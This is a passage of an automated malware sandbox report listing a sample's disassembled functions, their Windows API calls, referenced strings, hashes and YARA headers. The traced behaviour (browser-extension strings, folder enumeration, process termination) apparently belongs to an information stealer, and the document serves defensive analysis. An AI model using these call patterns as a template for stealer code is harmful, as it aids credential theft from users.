                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                        • String ID:
                                                        • API String ID: 211194620-0
                                                        • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                        • Instruction ID: 8e9cb38c2f5e81779c5c6715653a3fe6bbceb0049ff11cf406f6744ebc835a24
                                                        • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                        • Instruction Fuzzy Hash: A4811372910214ABCB08FBA4DD96DEE73B9AF55301F7055ADF046620A1EF346B48CF62
                                                        Function 0040F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                                        • API String ID: 998311485-3310892237
                                                        • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                        • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                                        • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                        • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                                        Function 004194D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 004194EB
                                                          • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                          • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                          • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                                        • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                        • String ID:
                                                        • API String ID: 396451647-0
                                                        • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                        • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                                        • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                        • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                                        Function 00B39737 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 00B39752
                                                          • Part of subcall function 00B38FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00B39785,00000000), ref: 00B38FC2
                                                          • Part of subcall function 00B38FB7: RtlAllocateHeap.NTDLL(00000000), ref: 00B38FC9
                                                          • Part of subcall function 00B38FB7: wsprintfW.USER32 ref: 00B38FDF
                                                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00B39812
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B39830
                                                        • CloseHandle.KERNEL32(00000000), ref: 00B3983D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                        • String ID:
                                                        • API String ID: 3729781310-0
                                                        • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                        • Instruction ID: 49c8cef028a0f6d77732706ed54a4987d80e52d312f958b2901f5b321075877f
                                                        • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                        • Instruction Fuzzy Hash: C0313A75E41248EFDB14DFE0CC49BEDB7B9EF45700F204499F506AA184DBB46A84CB52
                                                        Function 00418680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                                        • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                                        • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • CloseHandle.KERNEL32(?), ref: 00418761
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 1066202413-0
                                                        • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                        • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                                        • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                        • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                                        Function 00B388E7 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 00B38931
                                                        • Process32First.KERNEL32(?,00000128), ref: 00B38945
                                                        • Process32Next.KERNEL32(?,00000128), ref: 00B3895A
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • CloseHandle.KERNEL32(?), ref: 00B389C8
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 1066202413-0
                                                        • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                        • Instruction ID: 72e6aa81063493dc56014cb9a3e7ada8627a4943e4a16e03174ab41fbfeb8921
                                                        • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                        • Instruction Fuzzy Hash: F3312F72941218ABCB24DF94DD45FEEB7B9EB45701F2041D9F10AA61A0DB346F44CF92
                                                        Function 00414F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                                        • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                                        • lstrcatA.KERNEL32(?,008269D8), ref: 00414FAB
                                                        • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                        • String ID:
                                                        • API String ID: 2667927680-0
                                                        • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                        • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                                        • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                        • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                                        Function 004187C0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                                        • wsprintfA.USER32 ref: 00418850
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocProcesslstrcpywsprintf
                                                        • String ID: %dx%d
                                                        • API String ID: 2716131235-2206825331
                                                        • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                        • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                                        • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                        • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                                        Function 00B31A07 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcessstrtok_s
                                                        • String ID:
                                                        • API String ID: 3407564107-0
                                                        • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                        • Instruction ID: ddeacf7cf3dd85e7642bd0dadaed5d3800e0014b43535b69b030ac65a0cd67f3
                                                        • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                        • Instruction Fuzzy Hash: 76116DB4900209EFCB04EFE4D948AEDBBB9FF04305F6084A9E80567290E7306B04CF55
                                                        Function 00417980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                                        • wsprintfA.USER32 ref: 004179F3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocLocalProcessTimewsprintf
                                                        • String ID:
                                                        • API String ID: 1243822799-0
                                                        • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                        • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                                        • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                        • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                                        Function 00B37BE7 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 00B37C17
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B37C1E
                                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 00B37C2B
                                                        • wsprintfA.USER32 ref: 00B37C5A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                        • String ID:
                                                        • API String ID: 377395780-0
                                                        • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                        • Instruction ID: 6de023c0983d82bc89e0bf31e1c2478f82f00b4ed65846893b13fd5e9ebf5e99
                                                        • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                        • Instruction Fuzzy Hash: FC1127B2944118BBCB14DFC9DD45BBEB7F9FB4DB11F10425AF605A2280D6395940CBB1
                                                        Function 00B37C97 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00B37CCA
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B37CD1
                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00B37CE4
                                                        • wsprintfA.USER32 ref: 00B37D1E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                        • String ID:
                                                        • API String ID: 3317088062-0
                                                        • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                        • Instruction ID: 6456628bfa162cc85db5b227d3f69ad0b038937afeb35b0c0482e701a53efbbb
                                                        • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                        • Instruction Fuzzy Hash: 88115EB1A85218EFEB208B54DC49FA9B7B8FB05721F2043EAE51AA32C0CB7459408F51
                                                        Function 00B33880 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strtok_s
                                                        • String ID:
                                                        • API String ID: 3330995566-0
                                                        • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                        • Instruction ID: 20c5b141558a6be6df08f9158868b7d286a7a7090efdc5f179973c2f05451fa0
                                                        • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                        • Instruction Fuzzy Hash: BA11B3B4E40209EFDB14CFA6D988BAEB7F5EB08B05F20C129E025A6250D7B49605CF55
                                                        Function 00B39547 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileA.KERNEL32(00B33D55,80000000,00000003,00000000,00000003,00000080,00000000,?,00B33D55,?), ref: 00B39563
                                                        • GetFileSizeEx.KERNEL32(000000FF,00B33D55), ref: 00B39580
                                                        • CloseHandle.KERNEL32(000000FF), ref: 00B3958E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleSize
                                                        • String ID:
                                                        • API String ID: 1378416451-0
                                                        • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                        • Instruction ID: a8a06e432725a3782b44bbe21fa07cfae037a8abeca972ee8d1c772f7085e930
                                                        • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                        • Instruction Fuzzy Hash: 95F04F39E40308BBEB25DFF0DC49B9E77FAEB59710F21C694FA11A7280D67596418B40
                                                        Function 00B36D5A Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B36D31
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B36D4F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00B36D60
                                                        • Sleep.KERNEL32(00001770), ref: 00B36D6B
                                                        • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B36D81
                                                        • ExitProcess.KERNEL32 ref: 00B36D89
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                        • String ID:
                                                        • API String ID: 941982115-0
                                                        • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                        • Instruction ID: 94253fe0dac063937720b64dfbe29e5cf2020f726d4873691d800b8c8f344cb8
                                                        • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                        • Instruction Fuzzy Hash: D8F0BE38A40205BFE710AFE0CC0ABBD77B4EB05301F3085B8F112A11D0CBB04500CA56
                                                        Function 00406D40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `o@
                                                        • API String ID: 0-590292170
                                                        • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                        • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                                        • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                        • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                                        Function 00414BB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                                        • lstrcatA.KERNEL32(?,0082AA30), ref: 00414C08
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                          • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0082B7A0,?,000003E8), ref: 00414A4A
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
